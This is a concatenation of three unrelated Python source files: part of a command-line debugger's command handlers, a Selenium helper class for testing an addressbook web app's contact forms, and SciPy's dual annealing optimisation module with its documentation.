self._print(res)
self._reset_namespace()
def step(self, argv):
"""step
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
self._dbg.set_step()
raise CLI.CommandExit
def next(self, argv):
"""next
Continue execution until the next line in the current function
is reached or it returns."""
self._dbg.set_next(self._dbg.curframe)
raise CLI.CommandExit
def returns(self, argv):
"""returns
Continue execution until the current function returns."""
self._dbg.set_return(self._dbg.curframe)
raise CLI.CommandExit
def cont(self, arg):
"""cont
Continue execution, only stop when a breakpoint is encountered."""
self._dbg.set_continue()
if self._dbg.breaks:
raise CLI.CommandExit
else:
self._dbg._parser = None
raise CLI.CommandQuit
def jump(self, argv):
"""jump lineno
Set the next line that will be executed."""
if self._dbg.curindex + 1 != len(self._dbg.stack):
self._print("*** You can only jump within the bottom frame")
return
try:
arg = int(argv[1])
except ValueError:
self._print("*** The 'jump' command requires a line number.")
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self._dbg.curframe.f_lineno = arg
self._dbg.stack[self._dbg.curindex] = self._dbg.stack[self._dbg.curindex][0], arg
self._dbg.print_stack_entry(self._dbg.stack[self._dbg.curindex])
except ValueError as e:
self._print('*** Jump failed:', e)
else:
self._reset_namespace()
def quit(self, argv):
"""quit or exit - Quit from the debugger.
The program being executed is aborted."""
super(DebuggerCommands, self).quit(argv)
def args(self, argv):
"""args
Print the arguments of the current function."""
f = self._dbg.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
self._print(name, '=', None)
if name in dict:
self._print(dict[name])
else:
self._print("*** undefined ***")
def retval(self, argv):
"""retval
Show return value."""
val = self._dbg.retval()
if val is not None:
self._print(val)
def show(self, argv):
"""show [<name>...]
Shows the current frame's object and values. If parameter names are given
then show only those local names."""
f = self._dbg.curframe
if len(argv) > 1:
for name in argv[1:]:
try:
self._print("%25.25s = %s" % \
(name, _saferepr(f.f_locals[name])))
except KeyError:
self._print("%r not found." % (name,))
else:
self._ui.printf("%%I%s%%N (" % (f.f_code.co_name or "<lambda>",))
co = f.f_code
n = co.co_argcount
if co.co_flags & 4:
n += 1
if co.co_flags & 8:
n += 1
local = f.f_locals
for name in co.co_varnames[:n]:
val = local.get(name, "*** no formal ***")
self._print("%15.15s = %s," % (name, _saferepr(val)))
self._print(" )")
s = []
for name in co.co_varnames[n:]:
val = local.get(name, "*** undefined ***")
s.append("%25.25s = %s" % (name, _saferepr(val)))
if s:
self._print(" Compiled locals:")
self._print("\n".join(s))
# find and print local variables that were not defined when
# compiled. These must have been "stuffed" by other code.
extra = []
varnames = list(co.co_varnames) # to get list methods
for name, val in local.items():
try:
i = varnames.index(name)
except ValueError:
extra.append("%25.25s = %s" % (name, _saferepr(val)))
if extra:
self._print(" Extra locals:")
self._print("\n".join(extra))
def Print(self, argv):
"""Print <expression>
Print the value of the expression."""
try:
self._print(repr(self._dbg.getval(" ".join(argv[1:]))))
except:
ex, val = sys.exc_info()[:2]
self._print("***", ex, val)
def list(self, argv):
"""list [first [,last]]
List source code for the current file.
Without arguments, list 20 lines around the current line
or continue the previous listing.
With one argument, list 20 lines centered at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
last = None
if len(argv) >= 2:
first = max(1, int(argv[1]) - 10)
if len(argv) >= 3:
last = int(argv[2])
if last < first:
# Assume it's a count
last = first + last
elif self._dbg.lineno is None:
first = max(1, self._dbg.curframe.f_lineno - 10)
else:
first = self._dbg.lineno + 1
if last is None:
last = first + 20
filename = self._dbg.curframe.f_code.co_filename
self._print_source(filename, first, last)
def whatis(self, argv):
"""whatis arg
Prints the type of the argument."""
arg = " ".join(argv[1:])
try:
value = eval(arg, self._dbg.curframe.f_globals, self._dbg.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
self._print('***', exc_type_name + ':', repr(v))
return
# Is it a function?
try:
code = value.func_code
except:
pass
else:
self._print('Function', code.co_name)
return
# Is it an instance method?
try:
code = value.im_func.func_code
except:
pass
else:
self._print('Method', code.co_name)
return
# None of the above...
self._print(type(value))
def search(self, argv):
"""search <pattern>
Search the source file for the regular expression pattern."""
patt = re.compile(" ".join(argv[1:]))
filename = self._dbg.curframe.f_code.co_filename
if self._dbg.lineno is None:
start = 0
else:
start = max(0, self._dbg.lineno - 9)
lines = linecache.getlines(filename)[start:]
for lineno, line in enumerate(lines):
#line = linecache.getline(filename, lineno)
mo = patt.search(line)
if mo:
self._print_source(filename, lineno+start-10, lineno+start+10)
return
else:
self._print("Pattern not found.")
def _print_source(self, filename, first, last):
breaklist = self._dbg.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno)
if not line:
self._ui.printf('%Y[EOF]%N')
break
else:
s = []
s.append("%5.5s%s" % (lineno, self._ui.format(" %RB%N") if (lineno in breaklist) else " "))
if lineno == self._dbg.curframe.f_lineno:
s.append(self._ui.format("%I->%N "))
else:
s.append(" ")
self._print("".join(s), line.rstrip())
self._dbg.lineno = lineno
except KeyboardInterrupt:
pass
|
|
__author__ = 'ZSGX'
from model.contact import Contact
class ContactHelper:
def __init__(self, app):
self.app = app
def fill_contact_form(self, Contact):
wd = self.app.wd
self.app.edit_field(field_name="firstname", text=Contact.firstname)
self.app.edit_field(field_name="middlename", text=Contact.middlename)
self.app.edit_field(field_name="lastname", text=Contact.lastname)
self.app.edit_field(field_name="nickname", text=Contact.nickname)
self.app.edit_field(field_name="title", text=Contact.title)
self.app.edit_field(field_name="company", text=Contact.company)
self.app.edit_field(field_name="address", text=Contact.address)
# wd.find_element_by_name("theform").click()
#telephones
self.app.edit_field(field_name="home", text=Contact.homephone)
self.app.edit_field(field_name="mobile", text=Contact.mobilephone)
self.app.edit_field(field_name="work", text=Contact.workphone)
self.app.edit_field(field_name="fax", text=Contact.fax)
# email & homepage
self.app.edit_field(field_name="email2", text=Contact.email2)
self.app.edit_field(field_name="email3", text=Contact.email3)
self.app.edit_field(field_name="homepage", text=Contact.homepage)
# Secondary
self.app.edit_field(field_name="address2", text=Contact.address2)
self.app.edit_field(field_name="phone2", text=Contact.phone2)
self.app.edit_field(field_name="notes", text=Contact.notes)
#birthday
if Contact.bday is not None:
d = Contact.bday + 2
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % d).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % d).click()
if Contact.bmonth is not None:
m = Contact.bmonth + 1
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % m).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % m).click()
self.app.edit_field(field_name="byear", text=Contact.byear)
#anniversary
if Contact.aday is not None:
d = Contact.aday + 2
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % d).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % d).click()
if Contact.amonth is not None:
m = Contact.amonth + 1
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % m).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % m).click()
self.app.edit_field(field_name="ayear", text=Contact.ayear)
# photo
if Contact.filepath is not None:
wd.find_element_by_name("photo").send_keys(Contact.filepath)
def create(self, Contact):
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(Contact)
#confirm contact creation
wd.find_element_by_name("submit").click()
self.go_to_homepage()
self.contact_cache = None
def go_to_homepage(self):
wd = self.app.wd
if wd.current_url.endswith("addressbook/") and len(wd.find_elements_by_name("add")) > 0:
return
wd.find_element_by_link_text("home").click()
def go_to_details(self, index):
wd = self.app.wd
ind = index+2
self.go_to_homepage()
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[%s]/td[7]/a/img" % ind).click()
def go_to_details_by_id(self, id):
wd = self.app.wd
self.go_to_homepage()
wd.find_element_by_css_selector("a[href='view.php?id=%s']" % id).click()
def go_to_editpage_by_index_from_details(self, index):
wd = self.app.wd
self.go_to_details(index)
#init editing
wd.find_element_by_name("modifiy").click()
def go_to_editpage_by_id_from_details(self, id):
wd = self.app.wd
self.go_to_details_by_id(id)
#init editing
wd.find_element_by_name("modifiy").click()
def go_to_editpage_by_index_from_homepage(self, index):
wd = self.app.wd
ind = index+2
self.go_to_homepage()
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[%s]/td[8]/a/img" % ind).click()
def go_to_editpage_by_id_from_homepage(self, id):
wd = self.app.wd
self.go_to_homepage()
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def edit_contact(self, Contact):
wd = self.app.wd
self.fill_contact_form(Contact)
#confirm contact creation
wd.find_element_by_name("update").click()
self.go_to_homepage()
self.contact_cache = None
def delete_first_contact_from_homepage(self):
wd = self.app.wd
self.delete_contact_by_index_from_homepage(0)
def delete_contact_by_index_from_homepage(self, index):
wd = self.app.wd
self.go_to_homepage()
#select contact
wd.find_elements_by_name("selected[]")[index].click()
#delete
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.go_to_homepage()
self.contact_cache = None
def delete_contact_by_id_from_homepage(self, id):
wd = self.app.wd
self.go_to_homepage()
#select contact
wd.find_element_by_css_selector("input[id='%s']" % id).click()
#delete
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.go_to_homepage()
self.contact_cache = None
def delete_first_contact_while_editing(self):
wd = self.app.wd
self.delete_contact_by_index_while_editing(0)
def delete_contact_by_index_while_editing(self, index):
wd = self.app.wd
self.go_to_editpage_by_index_from_homepage(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/input[2]").click()
self.go_to_homepage()
self.contact_cache = None
def delete_contact_by_id_while_editing(self, id):
wd = self.app.wd
self.go_to_editpage_by_id_from_homepage(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/input[2]").click()
self.go_to_homepage()
self.contact_cache = None
def count(self):
wd = self.app.wd
self.go_to_homepage()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.go_to_homepage()
self.contact_cache = []
for el in wd.find_elements_by_name("entry"):
cell_list = el.find_elements_by_tag_name("td")
firstname = cell_list[2].text
lastname = cell_list[1].text
address = cell_list[3].text
mails = cell_list[4].text
tel = cell_list[5].text
id = el.find_element_by_name("selected[]").get_attribute("id")
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id, tel=tel,
address=address, mails = mails))
return list(self.contact_cache)
def get_contact_props_from_editpage(self, index):
wd = self.app.wd
self.go_to_editpage_by_index_from_homepage(index)
id = wd.find_element_by_name("id").get_attribute("value")
firstname = wd.find_element_by_name("firstname").get_attribute("value")
middlename = wd.find_element_by_name("middlename").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
nickname = wd.find_element_by_name("nickname").get_attribute("value")
company = wd.find_element_by_name("company").get_attribute("value")
title = wd.find_element_by_name("title").get_attribute("value")
address = wd.find_element_by_name("address").text
home = wd.find_element_by_name("home").get_attribute("value")
mobile = wd.find_element_by_name("mobile").get_attribute("value")
work = wd.find_element_by_name("work").get_attribute("value")
fax = wd.find_element_by_name("fax").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
homepage = wd.find_element_by_name("homepage").get_attribute("value")
address2 = wd.find_element_by_name("address2").text
phone2 = wd.find_element_by_name("phone2").get_attribute("value")
notes = wd.find_element_by_name("notes").text
return Contact(firstname=firstname, middlename=middlename,lastname=lastname, nickname=nickname, title=title,
company=company, address=address, homephone=home, mobilephone=mobile, workphone=work, fax=fax,
email=email, email2=email2, email3=email3, homepage=homepage, address2=address2,
phone2=phone2, notes=notes, id=id)
def clean(self, contact):
def exclude_spaces(str):
newstr = ' '.join(map(lambda x: x.strip(), str.split()))
return newstr
return Contact(id=contact.id, firstname=exclude_spaces(contact.firstname),
lastname=exclude_spaces(contact.lastname), address=exclude_spaces(contact.address),
homephone=exclude_spaces(contact.homephone), mobilephone=exclude_spaces(contact.mobilephone),
workphone=exclude_spaces(contact.workphone), phone2=exclude_spaces(contact.phone2),
email=exclude_spaces(contact.email), email2=exclude_spaces(contact.email2),
email3=exclude_spaces(contact.email3), tel=None, mails=None)
|
|
# Dual Annealing implementation.
# Copyright (c) 2018 Sylvain Gubian <[email protected]>,
# Yang Xiang <[email protected]>
# Author: Sylvain Gubian, Yang Xiang, PMP S.A.
"""
A Dual Annealing global optimization algorithm
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.optimize import OptimizeResult
from scipy.optimize import minimize
from scipy.special import gammaln
from scipy._lib._util import check_random_state
__all__ = ['dual_annealing']
class VisitingDistribution(object):
"""
Class used to generate new coordinates based on the distorted
Cauchy-Lorentz distribution. Depending on the steps within the strategy
chain, the class implements the strategy for generating new location
changes.
Parameters
----------
lb : array_like
A 1-D numpy ndarray containing lower bounds of the generated
components. Neither NaN or inf are allowed.
ub : array_like
A 1-D numpy ndarray containing upper bounds for the generated
components. Neither NaN or inf are allowed.
visiting_param : float
Parameter for visiting distribution. Default value is 2.62.
Higher values give the visiting distribution a heavier tail, this
makes the algorithm jump to a more distant region.
The value range is (0, 3].
rand_state : RandomState object
A numpy.random.RandomState object for using the current state of the
created random generator container.
"""
TAIL_LIMIT = 1.e8
MIN_VISIT_BOUND = 1.e-10
def __init__(self, lb, ub, visiting_param, rand_state):
self.visiting_param = visiting_param
self.rand_state = rand_state
self.lower = lb
self.upper = ub
self.bound_range = ub - lb
def visiting(self, x, step, temperature):
""" Based on the step in the strategy chain, new coordinated are
generated by changing all components is the same time or only
one of them, the new values are computed with visit_fn method
"""
dim = x.size
if step < dim:
# Changing all coordinates with a new visting value
visits = np.array([self.visit_fn(
temperature) for _ in range(dim)])
upper_sample = self.rand_state.random_sample()
lower_sample = self.rand_state.random_sample()
visits[visits > self.TAIL_LIMIT] = self.TAIL_LIMIT * upper_sample
visits[visits < -self.TAIL_LIMIT] = -self.TAIL_LIMIT * lower_sample
x_visit = visits + x
a = x_visit - self.lower
b = np.fmod(a, self.bound_range) + self.bound_range
x_visit = np.fmod(b, self.bound_range) + self.lower
x_visit[np.fabs(
x_visit - self.lower) < self.MIN_VISIT_BOUND] += 1.e-10
else:
# Changing only one coordinate at a time based on strategy
# chain step
x_visit = np.copy(x)
visit = self.visit_fn(temperature)
if visit > self.TAIL_LIMIT:
visit = self.TAIL_LIMIT * self.rand_state.random_sample()
elif visit < -self.TAIL_LIMIT:
visit = -self.TAIL_LIMIT * self.rand_state.random_sample()
index = step - dim
x_visit[index] = visit + x[index]
a = x_visit[index] - self.lower[index]
b = np.fmod(a, self.bound_range[index]) + self.bound_range[index]
x_visit[index] = np.fmod(b, self.bound_range[
index]) + self.lower[index]
if np.fabs(x_visit[index] - self.lower[
index]) < self.MIN_VISIT_BOUND:
x_visit[index] += self.MIN_VISIT_BOUND
return x_visit
def visit_fn(self, temperature):
""" Formula Visita from p. 405 of reference [2] """
factor1 = np.exp(np.log(temperature) / (self.visiting_param - 1.0))
factor2 = np.exp((4.0 - self.visiting_param) * np.log(
self.visiting_param - 1.0))
factor3 = np.exp((2.0 - self.visiting_param) * np.log(2.0) / (
self.visiting_param - 1.0))
factor4 = np.sqrt(np.pi) * factor1 * factor2 / (factor3 * (
3.0 - self.visiting_param))
factor5 = 1.0 / (self.visiting_param - 1.0) - 0.5
d1 = 2.0 - factor5
factor6 = np.pi * (1.0 - factor5) / np.sin(
np.pi * (1.0 - factor5)) / np.exp(gammaln(d1))
sigmax = np.exp(-(self.visiting_param - 1.0) * np.log(
factor6 / factor4) / (3.0 - self.visiting_param))
x = sigmax * self.rand_state.normal()
y = self.rand_state.normal()
den = np.exp(
(self.visiting_param - 1.0) * np.log((np.fabs(y))) / (
3.0 - self.visiting_param))
return x / den
class EnergyState(object):
"""
Class used to record the energy state. At any time, it knows what is the
currently used coordinates and the most recent best location.
Parameters
----------
lower : array_like
A 1-D numpy ndarray containing lower bounds for generating an initial
random components in the `reset` method.
upper : array_like
A 1-D numpy ndarray containing upper bounds for generating an initial
random components in the `reset` method
components. Neither NaN or inf are allowed.
callback : callable, ``callback(x, f, context)``, optional
A callback function which will be called for all minima found.
``x`` and ``f`` are the coordinates and function value of the
latest minimum found, and `context` has value in [0, 1, 2]
"""
# Maximimum number of trials for generating a valid starting point
MAX_REINIT_COUNT = 1000
def __init__(self, lower, upper, callback=None):
self.ebest = None
self.current_energy = None
self.current_location = None
self.xbest = None
self.lower = lower
self.upper = upper
self.callback = callback
def reset(self, func_wrapper, rand_state, x0=None):
"""
Initialize current location is the search domain. If `x0` is not
provided, a random location within the bounds is generated.
"""
if x0 is None:
self.current_location = self.lower + rand_state.random_sample(
len(self.lower)) * (self.upper - self.lower)
else:
self.current_location = np.copy(x0)
init_error = True
reinit_counter = 0
while init_error:
self.current_energy = func_wrapper.fun(self.current_location)
if self.current_energy is None:
raise ValueError('Objective function is returning None')
if (not np.isfinite(self.current_energy) or np.isnan(
self.current_energy)):
if reinit_counter >= EnergyState.MAX_REINIT_COUNT:
init_error = False
message = (
'Stopping algorithm because function '
'create NaN or (+/-) infinity values even with '
'trying new random parameters'
)
raise ValueError(message)
self.current_location = self.lower + rand_state.random_sample(
self.lower.size) * (self.upper - self.lower)
reinit_counter += 1
else:
init_error = False
# If first time reset, initialize ebest and xbest
if self.ebest is None and self.xbest is None:
self.ebest = self.current_energy
self.xbest = np.copy(self.current_location)
# Otherwise, we keep them in case of reannealing reset
def update_best(self, e, x, context):
self.ebest = e
self.xbest = np.copy(x)
if self.callback is not None:
val = self.callback(x, e, context)
if val is not None:
if val:
return('Callback function requested to stop early by '
'returning True')
def update_current(self, e, x):
self.current_energy = e
self.current_location = np.copy(x)
class StrategyChain(object):
"""
Class that implements within a Markov chain the strategy for location
acceptance and local search decision making.
Parameters
----------
acceptance_param : float
Parameter for acceptance distribution. It is used to control the
probability of acceptance. The lower the acceptance parameter, the
smaller the probability of acceptance. Default value is -5.0 with
a range (-1e4, -5].
visit_dist : VisitingDistribution
Instance of `VisitingDistribution` class.
func_wrapper : ObjectiveFunWrapper
Instance of `ObjectiveFunWrapper` class.
minimizer_wrapper: LocalSearchWrapper
Instance of `LocalSearchWrapper` class.
rand_state : RandomState object
A numpy.random.RandomState object for using the current state of the
created random generator container.
energy_state: EnergyState
Instance of `EnergyState` class.
"""
def __init__(self, acceptance_param, visit_dist, func_wrapper,
minimizer_wrapper, rand_state, energy_state):
# Local strategy chain minimum energy and location
self.emin = energy_state.current_energy
self.xmin = np.array(energy_state.current_location)
# Global optimizer state
self.energy_state = energy_state
# Acceptance parameter
self.acceptance_param = acceptance_param
# Visiting distribution instance
self.visit_dist = visit_dist
# Wrapper to objective function
self.func_wrapper = func_wrapper
# Wrapper to the local minimizer
self.minimizer_wrapper = minimizer_wrapper
self.not_improved_idx = 0
self.not_improved_max_idx = 1000
self._rand_state = rand_state
self.temperature_step = 0
self.K = 100 * len(energy_state.current_location)
def accept_reject(self, j, e, x_visit):
r = self._rand_state.random_sample()
pqv_temp = (self.acceptance_param - 1.0) * (
e - self.energy_state.current_energy) / (
self.temperature_step + 1.)
if pqv_temp <= 0.:
pqv = 0.
else:
pqv = np.exp(np.log(pqv_temp) / (
1. - self.acceptance_param))
if r <= pqv:
# We accept the new location and update state
self.energy_state.update_current(e, x_visit)
self.xmin = np.copy(self.energy_state.current_location)
# No improvement for a long time
if self.not_improved_idx >= self.not_improved_max_idx:
if j == 0 or self.energy_state.current_energy < self.emin:
self.emin = self.energy_state.current_energy
self.xmin = np.copy(self.energy_state.current_location)
def run(self, step, temperature):
self.temperature_step = temperature / float(step + 1)
self.not_improved_idx += 1
for j in range(self.energy_state.current_location.size * 2):
if j == 0:
if step == 0:
self.energy_state_improved = True
else:
self.energy_state_improved = False
x_visit = self.visit_dist.visiting(
self.energy_state.current_location, j, temperature)
# Calling the objective function
e = self.func_wrapper.fun(x_visit)
if e < self.energy_state.current_energy:
# We have got a better energy value
self.energy_state.update_current(e, x_visit)
if e < self.energy_state.ebest:
val = self.energy_state.update_best(e, x_visit, 0)
if val is not None:
if val:
return val
self.energy_state_improved = True
self.not_improved_idx = 0
else:
# We have not improved but do we accept the new location?
self.accept_reject(j, e, x_visit)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
return ('Maximum number of function call reached '
'during annealing')
# End of StrategyChain loop
def local_search(self):
# Decision making for performing a local search
# based on strategy chain results
# If energy has been improved or no improvement since too long,
# performing a local search with the best strategy chain location
if self.energy_state_improved:
# Global energy has improved, let's see if LS improves further
e, x = self.minimizer_wrapper.local_search(self.energy_state.xbest,
self.energy_state.ebest)
if e < self.energy_state.ebest:
self.not_improved_idx = 0
val = self.energy_state.update_best(e, x, 1)
if val is not None:
if val:
return val
self.energy_state.update_current(e, x)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
return ('Maximum number of function call reached '
'during local search')
# Check probability of a need to perform a LS even if no improvement
do_ls = False
if self.K < 90 * len(self.energy_state.current_location):
pls = np.exp(self.K * (
self.energy_state.ebest - self.energy_state.current_energy
) / self.temperature_step)
if pls >= self._rand_state.random_sample():
do_ls = True
# Global energy not improved, let's see what LS gives
# on the best strategy chain location
if self.not_improved_idx >= self.not_improved_max_idx:
do_ls = True
if do_ls:
e, x = self.minimizer_wrapper.local_search(self.xmin, self.emin)
self.xmin = np.copy(x)
self.emin = e
self.not_improved_idx = 0
self.not_improved_max_idx = self.energy_state.current_location.size
if e < self.energy_state.ebest:
val = self.energy_state.update_best(
self.emin, self.xmin, 2)
if val is not None:
if val:
return val
self.energy_state.update_current(e, x)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
return ('Maximum number of function call reached '
'during dual annealing')
class ObjectiveFunWrapper(object):
def __init__(self, func, maxfun=1e7, *args):
self.func = func
self.args = args
# Number of objective function evaluations
self.nfev = 0
# Number of gradient function evaluation if used
self.ngev = 0
# Number of hessian of the objective function if used
self.nhev = 0
self.maxfun = maxfun
def fun(self, x):
self.nfev += 1
return self.func(x, *self.args)
class LocalSearchWrapper(object):
"""
Class used to wrap around the minimizer used for local search
Default local minimizer is SciPy minimizer L-BFGS-B
"""
LS_MAXITER_RATIO = 6
LS_MAXITER_MIN = 100
LS_MAXITER_MAX = 1000
def __init__(self, bounds, func_wrapper, **kwargs):
self.func_wrapper = func_wrapper
self.kwargs = kwargs
self.minimizer = minimize
bounds_list = list(zip(*bounds))
self.lower = np.array(bounds_list[0])
self.upper = np.array(bounds_list[1])
# If no minimizer specified, use SciPy minimize with 'L-BFGS-B' method
if not self.kwargs:
n = len(self.lower)
ls_max_iter = min(max(n * self.LS_MAXITER_RATIO,
self.LS_MAXITER_MIN),
self.LS_MAXITER_MAX)
self.kwargs['method'] = 'L-BFGS-B'
self.kwargs['options'] = {
'maxiter': ls_max_iter,
}
self.kwargs['bounds'] = list(zip(self.lower, self.upper))
def local_search(self, x, e):
# Run local search from the given x location where energy value is e
x_tmp = np.copy(x)
mres = self.minimizer(self.func_wrapper.fun, x, **self.kwargs)
if 'njev' in mres.keys():
self.func_wrapper.ngev += mres.njev
if 'nhev' in mres.keys():
self.func_wrapper.nhev += mres.nhev
# Check if is valid value
is_finite = np.all(np.isfinite(mres.x)) and np.isfinite(mres.fun)
in_bounds = np.all(mres.x >= self.lower) and np.all(
mres.x <= self.upper)
is_valid = is_finite and in_bounds
# Use the new point only if it is valid and return a better results
if is_valid and mres.fun < e:
return mres.fun, mres.x
else:
return e, x_tmp
def dual_annealing(func, bounds, args=(), maxiter=1000,
local_search_options={}, initial_temp=5230.,
restart_temp_ratio=2.e-5, visit=2.62, accept=-5.0,
maxfun=1e7, seed=None, no_local_search=False,
callback=None, x0=None):
"""
Find the global minimum of a function using Dual Annealing.
Parameters
----------
func : callable
The objective function to be minimized. Must be in the form
``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
and ``args`` is a tuple of any additional fixed parameters needed to
completely specify the function.
bounds : sequence, shape (n, 2)
Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
defining bounds for the objective function parameter.
args : tuple, optional
Any additional fixed parameters needed to completely specify the
objective function.
maxiter : int, optional
The maximum number of global search iterations. Default value is 1000.
local_search_options : dict, optional
Extra keyword arguments to be passed to the local minimizer
(`minimize`). Some important options could be:
``method`` for the minimizer method to use and ``args`` for
objective function additional arguments.
initial_temp : float, optional
The initial temperature, use higher values to facilitates a wider
search of the energy landscape, allowing dual_annealing to escape
local minima that it is trapped in. Default value is 5230. Range is
(0.01, 5.e4].
restart_temp_ratio : float, optional
During the annealing process, temperature is decreasing, when it
reaches ``initial_temp * restart_temp_ratio``, the reannealing process
is triggered. Default value of the ratio is 2e-5. Range is (0, 1).
visit : float, optional
Parameter for visiting distribution. Default value is 2.62. Higher
values give the visiting distribution a heavier tail, this makes
the algorithm jump to a more distant region. The value range is (0, 3].
accept : float, optional
Parameter for acceptance distribution. It is used to control the
probability of acceptance. The lower the acceptance parameter, the
smaller the probability of acceptance. Default value is -5.0 with
a range (-1e4, -5].
maxfun : int, optional
Soft limit for the number of objective function calls. If the
algorithm is in the middle of a local search, this number will be
exceeded, the algorithm will stop just after the local search is
done. Default value is 1e7.
seed : {int or `numpy.random.RandomState` instance}, optional
If `seed` is not specified the `numpy.random.RandomState` singleton is
used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``RandomState`` instance, then that
instance is used.
Specify `seed` for repeatable minimizations. The random numbers
generated with this seed only affect the visiting distribution
function and new coordinates generation.
no_local_search : bool, optional
If `no_local_search` is set to True, a traditional Generalized
Simulated Annealing will be performed with no local search
strategy applied.
callback : callable, optional
A callback function with signature ``callback(x, f, context)``,
which will be called for all minima found.
``x`` and ``f`` are the coordinates and function value of the
latest minimum found, and ``context`` has value in [0, 1, 2], with the
following meaning:
- 0: minimum detected in the annealing process.
- 1: detection occured in the local search process.
- 2: detection done in the dual annealing process.
If the callback implementation returns True, the algorithm will stop.
x0 : ndarray, shape(n,), optional
Coordinates of a single n-dimensional starting point.
Returns
-------
res : OptimizeResult
The optimization result represented as a `OptimizeResult` object.
Important attributes are: ``x`` the solution array, ``fun`` the value
of the function at the solution, and ``message`` which describes the
cause of the termination.
See `OptimizeResult` for a description of other attributes.
Notes
-----
This function implements the Dual Annealing optimization. This stochastic
approach derived from [3]_ combines the generalization of CSA (Classical
Simulated Annealing) and FSA (Fast Simulated Annealing) [1]_ [2]_ coupled
to a strategy for applying a local search on accepted locations [4]_.
An alternative implementation of this same algorithm is described in [5]_
and benchmarks are presented in [6]_. This approach introduces an advanced
method to refine the solution found by the generalized annealing
process. This algorithm uses a distorted Cauchy-Lorentz visiting
distribution, with its shape controlled by the parameter :math:`q_{v}`
.. math::
g_{q_{v}}(\\Delta x(t)) \\propto \\frac{ \\
\\left[T_{q_{v}}(t) \\right]^{-\\frac{D}{3-q_{v}}}}{ \\
\\left[{1+(q_{v}-1)\\frac{(\\Delta x(t))^{2}} { \\
\\left[T_{q_{v}}(t)\\right]^{\\frac{2}{3-q_{v}}}}}\\right]^{ \\
\\frac{1}{q_{v}-1}+\\frac{D-1}{2}}}
Where :math:`t` is the artificial time. This visiting distribution is used
to generate a trial jump distance :math:`\\Delta x(t)` of variable
:math:`x(t)` under artificial temperature :math:`T_{q_{v}}(t)`.
From the starting point, after calling the visiting distribution
function, the acceptance probability is computed as follows:
.. math::
p_{q_{a}} = \\min{\\{1,\\left[1-(1-q_{a}) \\beta \\Delta E \\right]^{ \\
\\frac{1}{1-q_{a}}}\\}}
Where :math:`q_{a}` is a acceptance parameter. For :math:`q_{a}<1`, zero
acceptance probability is assigned to the cases where
.. math::
[1-(1-q_{a}) \\beta \\Delta E] < 0
The artificial temperature :math:`T_{q_{v}}(t)` is decreased according to
.. math::
T_{q_{v}}(t) = T_{q_{v}}(1) \\frac{2^{q_{v}-1}-1}{\\left( \\
1 + t\\right)^{q_{v}-1}-1}
Where :math:`q_{v}` is the visiting parameter.
.. versionadded:: 1.2.0
References
----------
.. [1] Tsallis C. Possible generalization of Boltzmann-Gibbs
statistics. Journal of Statistical Physics, 52, 479-487 (1998).
.. [2] Tsallis C, Stariolo DA. Generalized Simulated Annealing.
Physica A, 233, 395-406 (1996).
.. [3] Xiang Y, Sun DY, Fan W, Gong XG. Generalized Simulated
Annealing Algorithm and Its Application to the Thomson Model.
Physics Letters A, 233, 216-220 (1997).
.. [4] Xiang Y, Gong XG. Efficiency of Generalized Simulated
Annealing. Physical Review E, 62, 4473 (2000).
.. [5] Xiang Y, Gubian S, Suomela B, Hoeng J. Generalized
Simulated Annealing for Efficient Global Optimization: the GenSA
Package for R. The R Journal, Volume 5/1 (2013).
.. [6] Mullen, K. Continuous Global Optimization in R. Journal of
Statistical Software, 60(6), 1 - 45, (2014). DOI:10.18637/jss.v060.i06
Examples
--------
The following example is a 10-dimensional problem, with many local minima.
The function involved is called Rastrigin
(https://en.wikipedia.org/wiki/Rastrigin_function)
>>> from scipy.optimize import dual_annealing
>>> func = lambda x: np.sum(x*x - 10*np.cos(2*np.pi*x)) + 10*np.size(x)
>>> lw = [-5.12] * 10
>>> up = [5.12] * 10
>>> ret = dual_annealing(func, bounds=list(zip(lw, up)), seed=1234)
>>> print("global minimum: xmin = {0}, f(xmin) = {1:.6f}".format(
... ret.x, ret.fun))
